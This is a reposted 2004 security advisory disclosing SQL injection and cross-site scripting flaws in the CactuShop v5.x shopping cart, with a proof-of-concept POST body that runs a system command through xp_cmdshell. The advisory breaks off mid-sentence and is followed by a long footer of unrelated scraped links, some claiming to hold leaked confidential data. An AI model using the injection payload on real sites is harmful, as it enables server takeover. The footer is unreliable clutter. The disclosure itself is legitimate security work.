JSEMTS搜尋引擎
 

From: "S-Quadra Security Research"
To: "bugtraq" ; "full-disclosure"
Subject: CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities
Date: Wednesday, March 31, 2004 9:54 PM

S-Quadra Advisory #2004-03-31

Topic: CactuSoft CactuShop v5.x shopping cart software multiple security
vulnerabilities
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040331.txt
Release date: 31 Mar 2004

1. DESCRIPTION

CactuShop is an ASP application for running an e-commerce web site. It
incorporates a databased catalogue system, front end pages for product
navigation, back end pages for updating product details and robust
basket code for memorizing product selections as a visitor moves around
the web site. ASP software is designed to run on a Microsoft NT or Win
2000 server and to use MS Access, MS SQL Server or MySQL as a backend.
Please visit http://www.cactushop.com for information about CactuShop
shopping cart.

2. DETAILS

-- Vulnerability 1: SQL Injection vulnerability

An SQL Injection vulnerability has been found in following scripts :
'mailorder.asp' and 'payonline.asp'. User supplied input parameter is
'strItems' not filtered before being used in an SQL query. Thus the
query modification through malformed input is possible.

Successful exploitation of this vulnerability can enable an attacker
to execute commands in the system (via MS SQL xp_cmdshell function).

-- Vulnerability 2: Cross Site Scripting vulnerability found in
'largeimage.asp'script

By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.

--PoC code

--Vulnerability 1:

Platform: MS SQL Server as a backend

Posting this data to 'payonline.asp' executes 'dir c:' command

strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&
CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&
CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&
numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&
strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

-- Vulnerability 2:

http://[target]/popuplargeimage.asp?strImageTag=

3. FIX INFORMATION

11 Mar 2004: S-Quadra alerted CactuSoft (CactuShop developers) on these
issues.
15 Mar 2004: CactuSoft response:

"1) SQL Injection

On payonline.asp and all mailorder pages the strItems field is now
parsed for single-quote (') characters before being used with database
queries. Single quotes are escaped (replaced with 2 single-quotes) to
ensure SQL Injection won't work.

2) Javascript Injection

The strImageTag field is parse for HTML tags characters (< and >) and
are removed from the string. This should ensure against






搜尋引擎讓我們程式搜尋結果更加完美
  • 如果您覺得該文件有幫助到您,煩請按下我
  • 如果您覺得該文件是一個一無是處的文件,也煩請按下我

  • 搜尋引擎該文件您看起來是亂碼嗎?您可以切換編碼方式試試看!ISO-8859-1 | latin1 | euc-kr | euc-jp | CP936 | CP950 | UTF-8 | GB2312 | BIG5 |
    搜尋引擎本文件可能涉及色情、暴力,按我申請移除該文件

    搜尋引擎網址長?按我產生分享用短址

    ©2026 JSEMTS

    https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=5322536 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=7455783 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=2852918 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=7069498 https://tw.search.yahoo.com/search;_ylt=A8tUwZJ2QE1YaVcAUmFr1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC1zLXR3BGdwcmlkAwRuX3JzbHQDMARuX3N1Z2cDMARvcmlnaW4DdHcuc2VhcmNoLnlhaG9vLmNvbQRwb3MDMARwcXN0cgMEcHFzdHJsAwRxc3RybAM4NARxdWVyeQMlRTglQjYlODUlRTUlOEYlQUYlRTYlODQlOUIlRTclOUElODQlRTUlQUYlQjYlRTUlQUYlQjYlMjAlRTglODMlQTElRTUlQUUlODklRTUlQTglOUMEdF9zdG1wAzE0ODE0NTc3OTM-?p=%E8%B6%85%E5%8F%AF%E6%84%9B%E7%9A%84%E5%AF%B6%E5%AF%B6+%E8%83%A1%E5%AE%89%E5%A8%9C&fr2=sb-top-tw.search&fr=yfp-t-900-s-tw&rrjfid=8994411 https://tw.search.yahoo.com/search;_ylt=A8tUwZJ2QE1YaVcAUmFr1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC1zLXR3BGdwcmlkAwRuX3JzbHQDMARuX3N1Z2cDMARvcmlnaW4DdHcuc2VhcmNoLnlhaG9vLmNvbQRwb3MDMARwcXN0cgMEcHFzdHJsAwRxc3RybAM4NARxdWVyeQMlRTglQjYlODUlRTUlOEYlQUYlRTYlODQlOUIlRTclOUElODQlRTUlQUYlQjYlRTUlQUYlQjYlMjAlRTglODMlQTElRTUlQUUlODklRTUlQTglOUMEdF9zdG1wAzE0ODE0NTc3OTM-?p=%E8%B6%85%E5%8F%AF%E6%84%9B%E7%9A%84%E5%AF%B6%E5%AF%B6+%E8%83%A1%E5%AE%89%E5%A8%9C&fr2=sb-top-tw.search&fr=yfp-t-900-s-tw&rrjfid=6405436 [前往]http://kserver3.asuscomm.com/築夢天堂shoposintertek-twnallwinningpitotech[前往][前往][前往][前往][前往][教學] 3ds Max 啟動後閃退解決方法kkbox[前往]Zltravelsolixmoredigital[前往]Mem168tiktokhostingem[前往]TucaptionsPlay56Pinkoianime1zhanshaoyiJslt28microfusion.cloud[前往][前往][前往]Wudao28[機密] Misia Syu 許杏如(iwjtovgo)機密資料附件(2023)[前往]Sex8Dnaxcat[前往]myfone[前往]sapeslite[前往]npac-weiwuyingnetbridgetechipackerbooksimarketing.iwant-inSuncgbrandinlabsesg.tsmcPhotobuddhahttp://googledrive.asuscomm.com/[前往]短網址產生器GodaddySites[前往][前往]Ra2diy[前往]mediawiki[前往][前往]PixnetOnMyOjiGame[前往]ciogomajiOnlinebrdocsdigitaisfundricharsbichowsangsangcoop.fcuHamiltonchineseZhuoyuehamivideo.hinetgj.aizhan[前往]angle[前往][前往]richseafood[教學] Excel 在嘗試計算一個或多個公式時資源不足[前往][前往][前往]yep2storyyxsensingxiaoditechkadokawa[前往]ecosia[前往][前往]ICloudXiaoping777[前往][技術] Chrome瀏覽器使用公共解析Public DNSApk[前往][前往][前往][前往]wandertailrexkraft[教學] LINE電腦版更新版本後英文字型變小問題之解決[前往][分享] Arduino常用函數[前往][前往][前往]sanlienglobetape9x9[前往]Hinetminfish[前往][前往]Plurkportwell國立台中科技大學國立台中科技大學jcdqzdhcbec[前往]yphs.ntpcshianyshot69eosascNtd2u[教學] 縮網址服務fortunebreedersUlifeStyle[前往]frankknow[前往]taichungMicrosoft ExcelTrello[教學] 免費看影片網站推薦nownewslovettcreationswhichav[前往]MattersFaceBookSeo-lv[前往][分享] Chrome HTTP 已封鎖不安全的下載內容[前往]cheersJingdexianbusinessweekly[教學] Windows 家用版轉專業版[前往][前往]pixtastockO4ooohttp://samsung.jfa.com.tw/?site=1貸款貸款http://wsi-main-dyna.softether.net/世界之眼 blogspot世界之眼 blogspot[前往]168gamesfhttp://archivestar.42web.io/[教學] 三眼表模擬器(計時碼錶模擬器)gogoro[前往]Ppxclubacernewstaiwan[前往]animate-onlineshop[分享] WAMPs(XAMPP、WampServer、AppServ)介紹So0912[分享] 批次檔模擬VB6框架bookmarkshoomedia[前往]feloanotepad[前往]tunhouIWOPopdictionnaire.reverso[前往]lzdsxxb[前往]tcuGuelphchineseLineage45[前往]Yxwst58e-muse[技術] 筆電加速開機,Lenovo IdeaPad L340歸檔星球[前往][前往][前往][前往][教學] 批次文件嵌入和執行VBScript[教學] TCP 445 Port問題解決[教學] 模擬器、ROMSonzeblog[前往]search.yahooShortUrl[前往]Supergamedycteam-selectydcoatingPSE[前往][前往]baike[前往]carturejiufenglswtmec142gametwhowtoningselectyu-metal[前往]Game155daydreamerNxtc[前往]mrmadTaiwanSwineelearn.video.nccuaottecom2022old[前往]buybenFigmaOzportalwealth.businessweeklylotsmall[前往]Idcpf[前往]lerbolariobingAgamesthink3c[前往]synopsysDS-HK[前往]msi[教學] JavaScript速查klookyuejia100Line.ME[前往]Unaux 1workerman.wacaTWHKINCplain-menuttynutsrgakgcgmhgodiGame735buyben[前往]or-estore[前往][前往][前往][教學] 寄件者政策框架SPFfirstnature[前往][前往]Yilubbs[前往][教學] SEOSstt182[機密] 紀念資料(2023)nfumcae.nfusym-global[資訊] 阿彌陀佛menge[前往]web.piapp[教學] CPU AES 加解密效能測試ZyblsGoogleEditboucheron[前往][前往][前往]shophyphy[機密] 2010~2018年至中台情報人員名單[前往]boseIT TOP Blog